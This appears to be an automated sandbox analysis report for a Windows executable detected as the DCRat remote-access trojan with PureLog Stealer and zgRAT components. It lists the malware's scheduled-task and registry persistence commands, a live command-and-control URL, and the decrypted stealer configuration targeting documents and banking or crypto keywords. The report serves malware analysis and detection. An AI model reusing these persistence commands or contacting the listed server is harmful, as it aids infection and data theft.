Edit tour

Windows Analysis Report
m4n1AQRhaP.exe

Overview

General Information

Sample name:	m4n1AQRhaP.exe renamed because original name is a hash value
Original sample name:	b1af153b79cbbe7c7d3f0992fa692d76.exe
Analysis ID:	1639526
MD5:	b1af153b79cbbe7c7d3f0992fa692d76
SHA1:	fb0cc79ebfc140013af1ba698c76d3fda45d4ea7
SHA256:	d1b67660afb5f20cb094275f04bdb44ac8e79bba4f5625ebfc7b1ca5cec71001
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Infects executable files (exe, dll, sys, html)

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

m4n1AQRhaP.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\m4n1AQRhaP.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

schtasks.exe (PID: 6428 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6420 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6452 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 3208 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 3336 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 7 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4628 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbis" /sc ONLOGON /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3592 cmdline: schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 12 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3956 cmdline: schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5848 cmdline: schtasks.exe /create /tn "uwTuxQS3V" /sc ONLOGON /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2860 cmdline: schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4616 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4288 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gn" /sc ONLOGON /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1796 cmdline: schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6684 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5156 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3288 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6424 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6420 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

ikEtBZXIKU1m0Gn.exe (PID: 3064 cmdline: "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

iHstGpVMr4QFhc62UUbis.exe (PID: 392 cmdline: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

iHstGpVMr4QFhc62UUbis.exe (PID: 6408 cmdline: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

ikEtBZXIKU1m0Gn.exe (PID: 6528 cmdline: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

ikEtBZXIKU1m0Gn.exe (PID: 5460 cmdline: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

upfc.exe (PID: 908 cmdline: C:\Recovery\upfc.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

upfc.exe (PID: 1140 cmdline: C:\Recovery\upfc.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

uwTuxQS3V.exe (PID: 5532 cmdline: C:\Windows\bcastdvr\uwTuxQS3V.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

uwTuxQS3V.exe (PID: 6924 cmdline: C:\Windows\bcastdvr\uwTuxQS3V.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

Registry.exe (PID: 4196 cmdline: C:\Windows\IME\en-GB\Registry.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

Registry.exe (PID: 3548 cmdline: C:\Windows\IME\en-GB\Registry.exe MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

upfc.exe (PID: 6428 cmdline: "C:\Recovery\upfc.exe" MD5: B1AF153B79CBBE7C7D3F0992FA692D76)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
m4n1AQRhaP.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
m4n1AQRhaP.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Windows\IME\en-GB\Registry.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\IME\en-GB\Registry.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\bcastdvr\uwTuxQS3V.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\bcastdvr\uwTuxQS3V.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\upfc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\upfc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: m4n1AQRhaP.exe PID: 6756	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.m4n1AQRhaP.exe.730000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.m4n1AQRhaP.exe.730000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\IME\en-GB\Registry.exe, CommandLine: C:\Windows\IME\en-GB\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Windows\IME\en-GB\Registry.exe, NewProcessName: C:\Windows\IME\en-GB\Registry.exe, OriginalFileName: C:\Windows\IME\en-GB\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\IME\en-GB\Registry.exe, ProcessId: 4196, ProcessName: Registry.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 6472, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\m4n1AQRhaP.exe", ParentImage: C:\Users\user\Desktop\m4n1AQRhaP.exe, ParentProcessId: 6756, ParentProcessName: m4n1AQRhaP.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", ProcessId: 6472, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\m4n1AQRhaP.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\m4n1AQRhaP.exe", ParentImage: C:\Users\user\Desktop\m4n1AQRhaP.exe, ParentProcessId: 6756, ParentProcessName: m4n1AQRhaP.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline", ProcessId: 6472, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T19:51:19.415425+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49706	83.217.209.253	80	TCP
2025-03-15T19:52:00.586503+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49697	83.217.209.253	80	TCP
2025-03-15T19:52:30.819403+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49700	83.217.209.253	80	TCP
2025-03-15T19:52:55.772327+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49703	83.217.209.253	80	TCP
2025-03-15T19:53:20.758289+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49705	83.217.209.253	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: m4n1AQRhaP.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Avira: detection malicious, Label: TR/Spy.Agent.yhjcg
Source: C:\Users\user\Desktop\bJiZPSMv.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Recovery\upfc.exe	Avira: detection malicious, Label: TR/Spy.Agent.yhjcg
Source: C:\Users\user\Desktop\kmqOzLcc.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\ZzLYPzhu.log	Avira: detection malicious, Label: TR/Spy.KeyLogger.fcrgw
Source: C:\Users\user\Desktop\RBEiIUto.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Windows\IME\en-GB\Registry.exe	Avira: detection malicious, Label: TR/Spy.Agent.yhjcg
Source: C:\Users\user\Desktop\MilkDJCZ.log	Avira: detection malicious, Label: TR/PSW.Agent.ftabp
Source: C:\Users\user\Desktop\qLTnEFIs.log	Avira: detection malicious, Label: TR/Spy.KeyLogger.fcrgw
Source: C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Avira: detection malicious, Label: TR/Spy.Agent.yhjcg
Source: C:\Users\user\Desktop\kSqObZEE.log	Avira: detection malicious, Label: TR/PSW.Agent.ftabp
Source: C:\Users\user\AppData\Local\Temp\OEffu0Lctr.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\ISkSYroH.log	Avira: detection malicious, Label: HEUR/AGEN.1300079

Found malware configuration

Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	ReversingLabs: Detection: 80%
Source: C:\Recovery\upfc.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\Desktop\MilkDJCZ.log	ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\RBEiIUto.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\gXpxUtOK.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\kSqObZEE.log	ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\kmqOzLcc.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\mgFxlINb.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\paINcIrQ.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\rCwnUSpv.log	ReversingLabs: Detection: 25%
Source: C:\Windows\IME\en-GB\Registry.exe	ReversingLabs: Detection: 80%
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	ReversingLabs: Detection: 80%
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	ReversingLabs: Detection: 80%

Multi AV Scanner detection for submitted file

Source: m4n1AQRhaP.exe	Virustotal: Detection: 72%			Perma Link
Source: m4n1AQRhaP.exe	ReversingLabs: Detection: 80%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop\|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/\|.txt;.doc;.json\|1000\|t\nAppData\|{SYSTEMDRIVE}/Users/{USERNAME}/AppData/\|.txt;.doc;.json\|1000\|t\nDownloads\|{SYSTEMDRIVE}/Users/{USERNAME}/Downloads/\|.txt;.doc;.json\|1000\|t\nDocumentos\|{SYSTEMDRIVE}/Users/{USERNAME}/Documentos/\|.txt;.doc;.json\|1000\|t\nDocuments\|{SYSTEMDRIVE}/Users/{USERNAME}/Documents/\|.txt;.doc;*.json\|1000\|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;z8games;crossfire","_1":"150000","_2":"150","_3":"False"}}
Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["Z4vNlk0NP4VufLuEf2kMvo4oFKtpCyoxZfkKZssHqJIL096zj8QKfvvuAHHb0LKaPiV9ljoxJdflgsyGN4FEidRnuzKSkRQf8r5Rn6O9UcBCQJNRSAN6GG2wQrPvZVM1","ff43a303193c00a678de5ba4183d1959ec3f4e92d3123a05110d3de5f15d096e","0","MARCH_BUILD","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/","videolongpollDatalifedleLocalPublic"]]

Source: m4n1AQRhaP.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: m4n1AQRhaP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.pdb source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb2 source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 4x nop then jmp 00007FF88B4C13C6h	0_2_00007FF88B4C123D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 4x nop then jmp 00007FF88B4F13C6h	25_2_00007FF88B4F123D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 4x nop then jmp 00007FF88B5013C6h	27_2_00007FF88B50123D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 4x nop then jmp 00007FF88B4F13C6h	28_2_00007FF88B4F123D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 4x nop then jmp 00007FF88B4F13C6h	29_2_00007FF88B4F123D
Source: C:\Recovery\upfc.exe	Code function: 4x nop then jmp 00007FF88B4E13C6h	30_2_00007FF88B4E123D
Source: C:\Recovery\upfc.exe	Code function: 4x nop then jmp 00007FF88B4E13C6h	31_2_00007FF88B4E123D
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 4x nop then jmp 00007FF88B4C13C6h	33_2_00007FF88B4C123D
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 4x nop then jmp 00007FF88B4F13C6h	35_2_00007FF88B4F123D
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 4x nop then jmp 00007FF88B4E13C6h	38_2_00007FF88B4E123D
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 4x nop then jmp 00007FF88B5013C6h	39_2_00007FF88B50123D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 4x nop then jmp 00007FF88B4F13C6h	41_2_00007FF88B4F123D
Source: C:\Recovery\upfc.exe	Code function: 4x nop then jmp 00007FF88B4D13C6h	42_2_00007FF88B4D123D

Networking

Suricata IDS alerts for network traffic

